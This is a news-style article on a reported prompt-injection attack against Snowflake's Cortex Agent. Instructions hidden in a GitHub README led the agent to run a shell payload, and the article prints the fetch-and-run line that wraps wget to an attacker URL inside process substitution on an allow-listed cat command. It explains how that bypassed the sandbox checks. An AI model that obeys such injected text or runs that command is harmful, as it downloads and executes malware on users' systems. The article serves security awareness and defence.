Snowflake Cortex shows why AI agents cannot trust even a harmless-looking command
Snowflake Cortex AI’s sandbox escape exposes prompt flaws📷 Scraped: Mar 18, 2026
- ★An attacker hid prompt injection in a GitHub README, buried beneath seemingly useful documentation
- ★Cortex failed to flag the threat because it treated cat as safe, allowing process substitution without additional verification
- ★The 'bugbot' payload likely enabled remote access or system reconnaissance
Snowflake's Cortex Agent just learned the hard way: a sandbox is only as strong as its most poorly vetted allow-listed command. A prompt injection hidden in a GitHub README—buried beneath seemingly useful documentation—tricked the agent into executing a shell payload that fetched and ran malware via wget. The exploit bypassed built-in filters by abusing process substitution: cat <<(sh <<(wget -qO- [ATTACKER_URL]/bugbot)), a trick that slipped past Cortex's allow-listed cat command without triggering additional verification.
The technique is elegant in its simplicity. Process substitution turns cat—a command deemed harmless enough to skip scrutiny—into a delivery mechanism for arbitrary code execution. The bugbot payload likely functioned as a remote shell or reconnaissance tool, giving the attacker persistent access to probe the compromised environment. Early analysis suggests the malware was designed for system enumeration rather than immediate destruction, a pattern typical of attackers mapping infrastructure before escalating.
Simon Willison's technical breakdown confirms what AI security researchers have long warned: static command allow-lists create dangerous blind spots. When cat is presumed safe because it is common, attackers simply wrap their malice in familiar packaging. The Cortex incident is not an isolated failure but a systemic one, replicated across platforms that prioritize usability over runtime verification.
A GitHub README prompt injection exposed the systemic flaw of static command allow-listing
Command allow-lists are security theater, not protection📷 Scraped: Mar 18, 2026
PromptArmor reported the flaw to Snowflake, which patched the gap promptly. Yet the underlying pattern persists. Trust in command allow-lists remains widespread among AI agent platforms, even as evidence mounts that any command accepting dynamic input can be weaponized. If Cortex's cat looked harmless, what else sits quietly executable in similar sandboxes?
The community response has skewed skeptical of patch-and-move cycles. Developers and security researchers are pushing for stricter sandboxing, mandatory runtime verification, and behavior-based monitoring rather than static rule sets. The argument is straightforward: blacklisting or allow-listing specific commands assumes attackers will play by the same semantic categories engineers use to organize their tools. They do not.
The real signal here is that AI agents are not merely LLM endpoints—they are attack surfaces. Every tool call, every command accepted at face value, is a potential gateway for malware. Developers should treat all user-provided code, even documentation adjacent to code, as untrusted input requiring validation before execution. The Snowflake Cortex incident demonstrates that prompt injection has evolved beyond tricking language models into generating harmful text; it now weaponizes the execution layer itself. Security models must evolve in parallel, shifting from "is this command on the list?" to "what could this command actually do at runtime?" The gap between those questions is where attackers currently operate with impunity.

